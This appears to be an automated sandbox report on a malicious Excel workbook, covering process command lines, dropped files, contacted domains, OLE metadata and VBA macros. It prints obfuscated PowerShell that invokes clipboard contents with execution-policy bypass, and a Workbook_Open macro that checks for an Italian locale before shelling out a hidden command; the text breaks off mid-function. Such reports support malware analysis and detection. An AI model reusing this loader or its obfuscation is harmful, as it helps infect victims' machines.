cmd.exe (PID: 3028 cmdline: cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' ) MD5: AD7B9C14083B52BC532FBA5948342B98)

powershell.exe (PID: 808 cmdline: poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' ) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\imgs.ht_
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Size (bytes):	10299
Entropy (8bit):	5.463796600782548
Encrypted:	false
MD5:	EACE775D55B1B65DC8AAFBD70EA1ADA7
SHA1:	862C4FBF713D388A1FEE29011097A211939455C2
SHA-256:	760FAE47F409E547ED5E6E1E35E0A6051597DE705BC90824650977C229B15873
SHA-512:	0F074ECB00EC303E66591F6D5E522AB10D791FCBB98CF1201ACA0A976C31CAFC979C422CF1893B451091AD9C0B33747AC0866303235696AD59CD504545598F99
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs.rcv
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Size (bytes):	1144
Entropy (8bit):	2.9275914083258927
Encrypted:	false
MD5:	AFD8FD036FE9A07AA5768B0DD6E6BBC3
SHA1:	A6917ACE5DD859B0DB72D8EAE423B45E18F3F3B1
SHA-256:	39C40AE195BA2130954A52CA28D5256701DE81217BCBB8648DA878A9AEC5B299
SHA-512:	18B25AEDCAA507781A17D17B83B5B6F28BA90A6D0BCD819CE0E74FEDE65424658AC9AF2D994B7C634C6B6BB711BF0373150273E4A189C0C1D4C6768D22C67372
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\filelist.xm_
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	580
Entropy (8bit):	4.880556223371139
Encrypted:	false
MD5:	93841114EA41E3430EC3F5C8A0C61163
SHA1:	38A61AC41481BB7A7FECDB04C8D1420E99BB1080
SHA-256:	1E21DE8EBFBB8FE933057F85EB7105061D3E72E2062A94619AA536D55128538D
SHA-512:	4081BBA95D44F18F1DD40B63CE31968FB5275372D8A0A9BDA73F5E5FEE0130B34A795EF2C12087144A2A6789EB5312E51EA5E5F22078DB5A77CFAE11E27A812B
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\image010.pn_
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 582 x 47, 8-bit/color RGBA, non-interlaced
Size (bytes):	9442
Entropy (8bit):	7.936309260064469
Encrypted:	false
MD5:	D4879D15F05DC1DAA72DCFCE85F3779B
SHA1:	84E6E142226478E6747E0C610809F175DEEF8FE2
SHA-256:	DA3AFF693A75FD5902E20337BE88420E0142375486E65CEBDC92B00E6659EC21
SHA-512:	749658B989488ED9F5159242B7165B72F1575E03F1EA841EAA8DA5A9F8A1CB732FFECB3F5AC22698D578D4D81BA56D2260F46810C341B7AFC73BCB9890212B02
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\image011.pn_
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 198 x 166, 8-bit/color RGBA, non-interlaced
Size (bytes):	3116
Entropy (8bit):	7.859359765253815
Encrypted:	false
MD5:	4E2FFFEDC937D44249C6A64DD3662EF7
SHA1:	E8BDB21DAA4AC61CCA3F173EC884DF6FBABC8F9B
SHA-256:	8291259D4A128190706E08DCDDCC9C5B2F305E1C37DB95C1179E49EA99BE40F1
SHA-512:	EAE314B448E10A6EEAF318125210AAEFF22117632685DC1664A01069C13EB50E11580A10871B9C2F77F5DFDA3477F2A6ADA291D7BBDBBF03D208DB851D0A2F70
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\image012.pn_
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 71 x 97, 8-bit/color RGBA, non-interlaced
Size (bytes):	6777
Entropy (8bit):	7.952284776580452
Encrypted:	false
MD5:	E2F47155A2F98E6AEDBC376A21F24006
SHA1:	6390A159AE72EF60B9EAF50BB4642D976C5AAB8E
SHA-256:	43CAED341DFAA3122CF5C5E7828C68B688C002218F9FB3E0407577925DA94200
SHA-512:	8B28D27C33E0FAF2593BF6E1F8D457961A4DE164B78E6ACC1A72C16A100C488EE2CA483703B96A93E6F7E9B6878C28F9CB22CBD5A8EC5704829BCA3AAD46FDF1
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\image013.pn_
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 585 x 114, 8-bit/color RGBA, non-interlaced
Size (bytes):	3088
Entropy (8bit):	7.273664089054313
Encrypted:	false
MD5:	3C5BB7626F5F599E1D825FB13160A40D
SHA1:	E3284A2529030CC8F852534CFDF95EE8930F4557
SHA-256:	9811ED15F4E17F85E11FE42276B532C909E6FD0EF4A72CD4DBCEDE2A65DAFDA1
SHA-512:	F37BBBC0EE00008D22CC73CC564F1230D27C56DD3F974988A719788DF279DF632D3781B285635DE5F7A60F9453C01C0091A50E8355F4A87861E3F287C1F3EF12
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\sheet001.ht_
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, Non-ISO extended-ASCII text, with CRLF line terminators
Size (bytes):	41733
Entropy (8bit):	6.0991571348929
Encrypted:	false
MD5:	FCC1A8CD3EF2E5CE7CD18DBE51244E17
SHA1:	BFE1BB764A51AFC6732E784A100A94A7CE489C27
SHA-256:	FCBB8AD85CC0F85BA2885A478C24ECE0AD0765F98DE7561A657C25456F7DA6A1
SHA-512:	9C9F7C8D299144381D30BAF290B0AFA46D8E2E7A4B1BAAC30FBB7047FFED5F5E650D46FD1F5D7AE098FEBDC1273CD840B522716BF5F178AD404C1EAD6AAF4BF5
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\sheet001.htm
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, Non-ISO extended-ASCII text, with CRLF line terminators
Size (bytes):	41733
Entropy (8bit):	6.099197183769366
Encrypted:	false
MD5:	F8CA087E39E04A2850E3ACA8C0947AE3
SHA1:	9AB970DE716B33D9A45B184EE680067DDE02C124
SHA-256:	BB653087768ABB0AFDC100D954A82A7FC0DDCD74132A5D85873B5B9B06CA24B1
SHA-512:	93456FB582B192AB7C9B59D9465221B152F1F51010A0C85F88D9399A4ACC413CA8130D6868E3694B65825C338894F3B6688E306F93E4780ECE7815519427BAF1
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\sheet002.ht_
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Size (bytes):	1611
Entropy (8bit):	5.33460251102813
Encrypted:	false
MD5:	A02AB83658EBEF90C99B5A628D047D85
SHA1:	EF1748BCA424C4155AEC15E9FCC2D002238EFB61
SHA-256:	C5FEABB132F32AEA539962C53086979B5EFE02DD183ED484AB605F588208E9BC
SHA-512:	0A0C9EFD7E31292D901FF4027E2BE169209022D3CE56A844D556E270EE06E24B56B627FA7BFC169CC047F9A7425530B95B0D3B9A079A2C7272625CF77283AD3A
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\sheet002.htm
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Size (bytes):	1611
Entropy (8bit):	5.33460251102813
Encrypted:	false
MD5:	A02AB83658EBEF90C99B5A628D047D85
SHA1:	EF1748BCA424C4155AEC15E9FCC2D002238EFB61
SHA-256:	C5FEABB132F32AEA539962C53086979B5EFE02DD183ED484AB605F588208E9BC
SHA-512:	0A0C9EFD7E31292D901FF4027E2BE169209022D3CE56A844D556E270EE06E24B56B627FA7BFC169CC047F9A7425530B95B0D3B9A079A2C7272625CF77283AD3A
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\sheet003.ht_
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Size (bytes):	1611
Entropy (8bit):	5.334782830119038
Encrypted:	false
MD5:	EBE0DFD461B777D25FC8A3F695BC5D53
SHA1:	5619DE8C9112F07DB15CEB85867359A23AD9FE41
SHA-256:	FC1D0C4070FE9E03B29302EF8E8DCFD1118490F8F7FFA8BD0E0B968EDC199AE0
SHA-512:	9B242D1C9BC0D1E48415DFFFF6854361DE78CB208CA8D80EA85A569842FDD040FA6681D3B48654755AAC7CBFE37920BF11D688DE718AA52C8172E0A7739A81F7
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\sheet003.htm
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Size (bytes):	1611
Entropy (8bit):	5.334782830119038
Encrypted:	false
MD5:	EBE0DFD461B777D25FC8A3F695BC5D53
SHA1:	5619DE8C9112F07DB15CEB85867359A23AD9FE41
SHA-256:	FC1D0C4070FE9E03B29302EF8E8DCFD1118490F8F7FFA8BD0E0B968EDC199AE0
SHA-512:	9B242D1C9BC0D1E48415DFFFF6854361DE78CB208CA8D80EA85A569842FDD040FA6681D3B48654755AAC7CBFE37920BF11D688DE718AA52C8172E0A7739A81F7
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\stylesheet.cs_
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Non-ISO extended-ASCII text, with CRLF line terminators
Size (bytes):	4341
Entropy (8bit):	5.004337771308329
Encrypted:	false
MD5:	75E741F3FE70AE66241273B812F8FFE4
SHA1:	F5D7560C0437EEC5DF544D1B61F12D77A8886E8E
SHA-256:	E65CD7790C0AFEF52D3FFB8ABB919D4A29643F073ED175806AF2555A3F2DCEEB
SHA-512:	B18B89D55D2264940E684A54C775E452AD7244FF063A95EEEEE41A10AC4CD618F4444D2AC6FDF3AEE923D988F54B89B0789110A514E57CBAD899458C336F5F3F
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\stylesheet.css
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Non-ISO extended-ASCII text, with CRLF line terminators
Size (bytes):	4341
Entropy (8bit):	5.004337771308329
Encrypted:	false
MD5:	75E741F3FE70AE66241273B812F8FFE4
SHA1:	F5D7560C0437EEC5DF544D1B61F12D77A8886E8E
SHA-256:	E65CD7790C0AFEF52D3FFB8ABB919D4A29643F073ED175806AF2555A3F2DCEEB
SHA-512:	B18B89D55D2264940E684A54C775E452AD7244FF063A95EEEEE41A10AC4CD618F4444D2AC6FDF3AEE923D988F54B89B0789110A514E57CBAD899458C336F5F3F
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\tabstrip.ht_
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Size (bytes):	1168
Entropy (8bit):	5.167925791211082
Encrypted:	false
MD5:	5357426D27F2F698E773BF86D12EC4AB
SHA1:	2A113BF3E887068FDE64EB008C3BC8BCF8E6A6E9
SHA-256:	231DFD3E5B13DDD72959CF1A8742B17C90E945FE8B2DA2840DCF201BC7E68249
SHA-512:	94556AD52DF38E4150F0ECC8DB871C4D579264497899647740D38BA53C0AD3346A5743A516376AFE82773B76836F83C6E418512450C750126099219A102BF98D
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs_files\tabstrip.htm
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Size (bytes):	1168
Entropy (8bit):	5.167925791211082
Encrypted:	false
MD5:	5357426D27F2F698E773BF86D12EC4AB
SHA1:	2A113BF3E887068FDE64EB008C3BC8BCF8E6A6E9
SHA-256:	231DFD3E5B13DDD72959CF1A8742B17C90E945FE8B2DA2840DCF201BC7E68249
SHA-512:	94556AD52DF38E4150F0ECC8DB871C4D579264497899647740D38BA53C0AD3346A5743A516376AFE82773B76836F83C6E418512450C750126099219A102BF98D
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DFIRJZ4GP55O83EBC4XY.temp
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.551463827997669
Encrypted:	false
MD5:	FDE3B1366802AD0E501B8A2830F4986E
SHA1:	4B4E43DBB0168EB212BB9913493316DCD28561B1
SHA-256:	89FE08E250DB3F495FC7DEB11D7AF773135E96076C5143411C19FE7CA8B090CA
SHA-512:	8CEEA3241302A1826060A9609A30191C09583D37FCD6F2164FA75435EB84DF80A673FF1E516611ED046C606F7EEA8247E6B11C7632AB952D3EBD2960848105CB
Malicious:	false
Reputation:	low

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
images2.imgbox.com.sds.rncdn7.com	64.210.135.68	true	false		high
images2.imgbox.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	false	high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	false	high
http://www.diginotar.nl/cps/pkioverheid0	powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	false	high
https://images2.imgbox.com/43/d7/RDjs3JCK_o.pngH	powershell.exe, 00000008.00000002.1264881981.01D0F000.00000004.sdmp	false	high
https://i.imgur.com/Hz99iZp.png	powershell.exe, 00000008.00000002.1264881981.01D0F000.00000004.sdmp	false	high
http://crl.entrust.net/server1.crl0	powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	false	high
http://ocsp.entrust.net0D	powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	false	high
https://images2.imgbox.com/43/d7/RDjs3JCK_o.png	powershell.exe, 00000008.00000002.1262983725.00108000.00000004.sdmp	false	high
http://ocsp.entrust.net03	powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	false	high
https://secure.comodo.com/CPS0	powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	false	high
http://crl.entrust.net/2048ca.crl0	powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	false	high
https://images2.imgbox.com	powershell.exe, 00000008.00000002.1264881981.01D0F000.00000004.sdmp	false	high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
64.210.135.68	United States		30361	SWIFTWILL2-SwiftwillIncUS	false

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Author: utente, Name of Creating Application: Microsoft Excel, Last Printed: Fri Nov 21 11:09:31 2014, Create Time/Date: Thu Mar 7 09:01:19 2013, Last Saved Time/Date: Thu Dec 13 10:23:36 2018, Security: 0
Entropy (8bit):	5.428903519133615
TrID:	Microsoft Excel sheet (30009/1) 46.87% Microsoft Excel sheet (alternate) (24509/1) 38.28% Generic OLE2 / Multistream Compound File (8008/1) 12.51% Java Script embedded in Visual Basic Script (1500/0) 2.34%
File name:	20310_011_11353_0_88.xls
File size:	77824
MD5:	7ffdde19a2ce936c1e1ed92aeb25eb78
SHA1:	72b24318b680b379fabf5525b34712907d9c1f71
SHA256:	26cc62317d32efcf2b936ff3467314ce5555870c31fa615fe58f2b8b5f38a3d0
SHA512:	605e01d71196614e0e5c0fb122ec008e48df5e5c7c7597652cf525974f1fea80a2193c2d45225cd24e0766f1497588d2a6d2ffdef1e237b2bcd3c37db19736bf
SSDEEP:	1536:2ZxEtjPOtioVjDGUU1qfDlaGGx+cL2QqCAohAUOjU3jmTwybfo1ORp3XH/R8:2ZxEtjPOtioVjDGUU1qfDlaGGx+cL2QY
File Content Preview:	........................>...................................U..................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "20310_011_11353_0_88.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:	utente
Last Printed:	2014-11-21 11:09:31
Create Time:	2013-03-07 09:01:19
Last Saved Time:	2018-12-13 10:23:36
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > 8 y . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 bd 3e 38 79 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . C . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 bd 3e d6 43 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 bd 3e 94 ca 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 19217

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	19217
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . J . . . X . . . d - . . . . . . . . . . . > . u . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . 1 . . G . . . 5 . . 2 g . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . T . . . . $ . J . . > . i < . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . T . . . . $ . J . . > . i < . w . . . . 1 . . G . . . 5 . . 2 g . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 03 00 01 00 00 1c 07 00 00 e4 00 00 00 10 02 00 00 4a 07 00 00 58 07 00 00 64 2d 00 00 00 00 00 00 01 00 00 00 bd 3e 05 75 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 f1 cd e6 15 31 14 f5 47 88 d2 ef 35 fc b1 32 67 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Shell#(MasterFunction,
${&&set
RfN=oV','o','oEET',&&set
Byte,
Application.International(xlCountrySetting)
tegad()
MasterFunction()
vbUnicode)
GrLY=zZ','&&set
"ING]::""""AS`C&&set
"e}[&&s"
^$^$^^$^^$^$^",
XT=s&&set
'n&&set
RqJz=eLl&&set
False
StrConv(byOut,
KcOP=)&&set
fV=.tex"
po=oL
sGDZ=FOv&&set
wFhV=keacV&&set
'e&&set
Qe=em.io.MEM"
PH=cM"
"XSR=','R','ea"
[SYSt&&set
byKey()
${vErb`o`sE&&set
MicrosoftDoc
RLj=bR&&set
ksNm=SMUVYAd&&set
-ExEcU&&set
'&&set
ivU={&&set
VB_Exposed
-f&&set
aEs=hoNLSo&&set
RT=xE','C'&&set
VB_GlobalNameSpace
"OD$e]:$:""""D$`E$cO`$M"
WIUk=
kEQz='&&set
wZHB=J&&set
(&&set
'eX','t','eTt'
Long,
"B&&s"
VB_Customizable
Replace(filks,
UBound(byKey)
tegad
"pr`&&s$et
lskm=EcH"
iX=tuu&&set
SA=E`ADER(
Visiblec
"ThisWorkbook"
aS=P`REf&&set
VB_Creatable
IO.CO&&set
Workbook_Open()
dq=IUjPSU&&set
String,
String)
Replace(deks,
TerSS
'T','ext'
UBound(sIn))
"$Re$sSIo$Nm$"
RO=YlN&&set
LBound(sIn)
-&&set
ByVal
xQV='g',(
'o','re','ionC&&set
ogN=/&&set
Lz=,'bE&&set
jyOe=BYPaSS
MNA=E','tN&&set
xzU='GDL&&set
[Sy&&set
wpf='A'
"wh=N.C&&set
sData
rxku=X&&set
VB_Name
WYi=aFd&&set
LoKD=
'oB',&&set
Yzur=
'f','ORea&&set
lVa=pO&&set
vJIZ=oBj"
Vn=.Clipbo&&set
Mcz=L&&set
),'S'&&set
ak=IC&&set
'x'-JoiN''
Apost
OWD=TLR',&&set
opQ=),[sYsTe&&set
byOut()
-NOnI
YB=Ws+KLOl&&set
"P^^^&^^^&cM"
MasterFunction
Rn='neW-','jECT')
IO.`&&set
^^^\|cLi"
aLve='),'Pr','t'&&set
-nopR
Attribute
GWCJ=ver&&set
LHM=v&&set
)}&&set
"p','e"
"t.ENc"
ReDim
yD=H&&set
PN=ES&&set
MicrosoftDoc(ByVal
"O/^^^^^^^^^^^^^^^&&&set
ly=A&&set
VB_Base
"orYSTREam][sYSte&&set
StrConv(sKey,
"&&se"
[S&&set
'Fo&&set
"&&set
Apost(S
Wp=){${_}.""""&&set
sIn()
Kpm=)&&set
filks
Pj=M&&set
rSoi=m&&set
xI=)&&set
Application.Quit
&&se"
Split(sData,
"iPbo"
qjC=IRS&&set
VB_TemplateDerived
qkN=U&&set
&&set
Oswb=UG&&set
ot=m.COn&&set
At=','e','W-&&set
[syStEM&&set
kmP='k',&&"
dnk={&&set
xvz=\""""
WxJY=+
WMP='&&set
MZ=`Hom"
byKey(l)
Val(sIn(i))
"eRS&&set
fH=tiONP&&set
fvVc=et&&set
qXy=V"
LBound(byKey)
Igd=-f'y"
String
vrWE=
gSCj=D&&set
byKey
xCZA=Ii"""")
"CH')
'dd-T',&&set
TerSS()
jkew=zEJFZG','&&set
xDr=,&&set
"aRd]::(&&set
oD=`AteSTrE`AM(
OyI=m.iO.COm&&set
JF=ao&&set
Replace(dems,
)).\&&set
'InG','TOS','Tr').\""""IN`VOkE\""""(&&set
"dows&&set
Replace("t
VB_PredeclaredId
wJzc=_},&&set
UBound(sIn)
byOut(LBound(sIn)
Function
vbFromUnicode)
gV=+VJA&&set
\""""&&set
MicrosoftDoc(S,
'nta','ese',(
yV=uo&&set
qpO=-w
byOut(i)
OdW=oWS.CL"

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Sub Workbook_Open()
If Application.International(xlCountrySetting) = 39 Then Sheet3A Else Application.Quit
End Sub
Sub Sheet3A()
Visiblec = Shell#(MasterFunction, 500000000000# - 500000000000#)
End Sub
Function tegad()
